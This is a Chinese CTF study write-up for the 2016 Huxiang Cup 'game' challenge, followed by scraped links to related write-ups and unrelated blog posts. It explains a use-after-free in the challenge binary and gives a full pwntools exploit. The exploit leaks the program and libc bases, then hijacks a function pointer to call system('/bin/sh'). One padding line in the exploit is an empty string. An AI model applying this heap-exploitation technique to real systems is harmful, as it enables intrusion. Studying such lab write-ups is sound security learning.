0x00 分析程序

根据分析,我们可以得到以下重要数据结构

0x01 发现漏洞

1.在武器使用次数耗光后,程序会把存储该武器的堆块free,在free的时候没有清空指针,造成悬挂指针

2.comment存储在一个大小和武器块一样的堆块中,我们武器释放后再执行commit函数,那么武器堆块和comment堆块是同一块堆块

0x02 漏洞利用

1.在comment函数中向堆块中写入16字节的ascii码,再利用show_weapon函数把武器数据结构中的attack函数地址泄露出来,由此可以计算得到程序基址

2.利用程序基址计算出printf地址,再将printf函数写到attack函数处,再调用attack函数(相当于调用printf函数)把memset函数地址打印出来,由此可以计算出libc基址

3.得到了libc基址,就可以根据libc.so库算出system_addr,再利用comment将system函数写到attack函数处,在堆块中写入‘/bin/sh’,调用attack函数便可得到shell.

0x03 exp

from pwn import *

t = process('./game')

libc = ELF('./libc.so')

context.log_level = "debug"

def warehouse(count):

    t.recvuntil('$')

    t.sendline('build_warehouse')

    t.recvuntil('want have?\n')

    t.sendline(str(count))

def buy(name, tid):

    t.recvuntil('$')

    t.sendline('buy_weapon')

    t.recvuntil('buy?\n')

    t.sendline(name)

    t.recvuntil('weapon?\n')

    t.sendline(str(tid))

def show(tid):

    t.recvuntil('$')

    t.sendline('show_weapon')

    t.recvuntil('warehouse\n')

    t.sendline(str(tid))

def attack(tid):

    t.recvuntil('$')

    t.sendline('attack_boss')

    t.recvuntil('warehouse\n')

    t.sendline(str(tid))

def comment(co_buff):

    t.recvuntil('$')

    t.sendline('comment')

    t.recvuntil('?\n')

    t.send(co_buff)

def leak_addr(addr,printf_plt):

    co_buff = ''

    co_buff += '%%%d$s.' % (7)

    co_buff = co_buff.ljust(16, '\x00')

    co_buff += p32(printf_plt)

    co_buff += '\n'

    comment(co_buff)

    show(0)

    t.sendline('attack_boss')

    t.recvuntil('warehouse\n')

    payload = ''

    payload += ''* 0x04

    payload += p32(addr)

    t.sendline(payload)

    data = t.recv(4)

    back_addr = u32(data[:4])

    return back_addr

def main():

    t.recvuntil('name?\n')

    t.sendline('xt')

    warehouse(3)

    buy('UMP45', 0)

    attack(0)

    attack(0)

    attack(0)

    show(0)

    co_buff = ''

    co_buff += 'd' * 0x16 + '\n'

    comment(co_buff)

    show(0)

    t.recvuntil('Weapon name: ')

    t.recv(16)

    data = t.recvuntil('price:')[:-7]

    addr = u32(data[:4].ljust(4, '\x00'))

    proc_addr = addr - 0x1287

    success('proc_addr:' + hex(proc_addr))

    memset_got = 0x00002154 + proc_addr

    printf_plt = 0x00000710 + proc_addr

    memset_addr = leak_addr(memset_got,printf_plt)

    offset_memset = libc.symbols['memset']

    offset_system = libc.symbols['system']

    libc_base = memset_addr - offset_memset

    system_addr = libc_base + offset_system

    success('libc_base:' + hex(libc_base))

    success('system_addr:' + hex(system_addr))

    co_buff = ""

    co_buff += "/bin/sh;"

    co_buff = co_buff.ljust(16, '\x00')

    co_buff += p32(system_addr)

    co_buff += "\n"

    comment(co_buff)

    t.sendline("attack_boss")

    t.recvuntil("warehouse\n")

    payload = ""

    payload += ""

    t.sendline(payload)

    t.interactive()

if __name__ == '__main__':

    main()

uaf-湖湘杯2016game_学习的更多相关文章

  1. CTF 湖湘杯 2018 WriteUp (部分)

    湖湘杯 2018 WriteUp (部分),欢迎转载,转载请注明出处! 1.  CodeCheck(WEB) 测试admin ‘ or ‘1’=’1’# ,php报错.点击登录框下面的滚动通知,URL ...

  2. 2017湖湘杯复赛writeup

    2017湖湘杯复赛writeup 队伍名:China H.L.B 队伍同时在打 X-NUCA  和 湖湘杯的比赛,再加上周末周末周末啊,陪女朋友逛街吃饭看电影啊.所以精力有点分散,做出来部分题目,现在 ...

  3. 2019 湖湘杯 Reverse WP

    0x01 arguement 下载链接:https://www.lanzous.com/i7atyhc 1.准备 获取到信息: 32位的文件 upx加密文件 在控制台打开文件 使用"upx ...

  4. 【CTF】2019湖湘杯 miscmisc writeup

    题目来源:2019湖湘杯 题目链接:https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id= ...

  5. 2017湖湘杯Writeup

    RE部分 0x01 Re4newer 解题思路: Step1:die打开,发现有upx壳. Step2:脱壳,执行upx -d 文件名即可. Step3:IDA打开,shift+F12看字符串. 点进 ...

  6. Bugku Writeup —文件上传2(湖湘杯)

    我们先来看下题目,题目说明是文件上传 我们可以尝试通过构造payload来进行测试 php://filter/read=convert.base64-encode/resource=flag 获取到f ...

  7. 2018湖湘杯web、misc记录

    1.题目名 Code Check 打开题目,右键发现有id参数的url,简单base64解码以后发现不是明文,说明利用了其他的加密方式,那么应该会有具体的加密方式给我们,于是试试常见的文件泄露,可以发 ...

  8. 湖湘杯2020_ReMe

    查壳后发现是由Python2.7环境下编译得到的exe可执行文件 由此想到可将exe转为pyc文件再反编译成py文件 且该方法只适用于py2 无混淆 因为py3的字节码结构有些许变化 step1: 在 ...

  9. 湖湘杯2020 writeup

    这个平台中间卡的离谱,卡完过后交了flag分还掉了 Web 题目名字不重要 也算是非预期吧,赛后y1ng师傅也说了因为要多端口环境必须这样配,预期解很难 NewWebsite 后台弱口令admin a ...

随机推荐

  1. MySQL · 性能优化 · MySQL常见SQL错误用法

    1. LIMIT 语句 分页查询是最常用的场景之一,但也通常也是最容易出问题的地方.比如对于下面简单的语句,一般DBA想到的办法是在type, name, create_time字段上加组合索引.这样 ...

  2. 搭建 CDH 版本hive

    搭建一个完整的cdh 的版本,由于涉及的产品和步骤太多,在客户那里部署环境时,很容易出现意外,所以如果只是需要部署一个测试环境来进行验证,我们没有必要完完整整的部署整个cdh.   下面是通过命令行的 ...

  3. 企业级应用,如何实现服务化三(dubbo入门案例)

    今天是六一儿童节,从千里之外的广州,回到了贵州老家,真好!好山好水好心情,好了接着写点东西.这是企业级应用,如何实现服务化系列的第三篇.在上一篇:企业级应用,如何实现服务化二(dubbo架构)中,认识 ...

  4. one jar(转)

    http://blog.csdn.net/kabini/article/details/1598827

  5. MyBatis逆向工程代码的生成以及使用详解(持续更新)

    逆向工程简介什么是逆向工程:        mybatis需要程序员自己编写sql语句,mybatis官方提供逆向工程,可以针对单表自动生成mybatis执行所需要的代码(mapper.java.ma ...

  6. Syncd-开源自动化部署工具

    官网地址:https://gitee.com/dreamans/syncd/issues syncd是一款开源的代码部署工具,它具有简单.高效.易用等特点,可以提高团队的工作效率. 目前只支持类Lin ...

  7. MySQL - 执行sql报错USING BTREE

    问题与分析 在执行sql文件时发现报错如下: You have an error in your SQL syntax; check the manual that corresponds to yo ...

  8. IDEA 快捷键MacOS

    Alt + Enter 导入包,自动修正 Command + N 查找类 Command + Shift + N查找文件 Command + Alt + L格式化代码 Command + Alt + ...

  9. 简单的Javascript图片延迟加载库Echo.js

    简介: 和 Lazy Load 一样,Echo.js 也是一个用于图像延迟加载 JavaScript.不同的是 Lazy Load 是基于 jQuery 的插件,而 Echo.js 不依赖于 jQue ...

  10. 洛谷P1896||bzoj1087 [SCOI2005]互不侵犯

    bzoj1087 洛谷P1896 想了很久,太久没做状压都已经不会了... 状压每一行就好了 #include<cstdio> #include<algorithm> #inc ...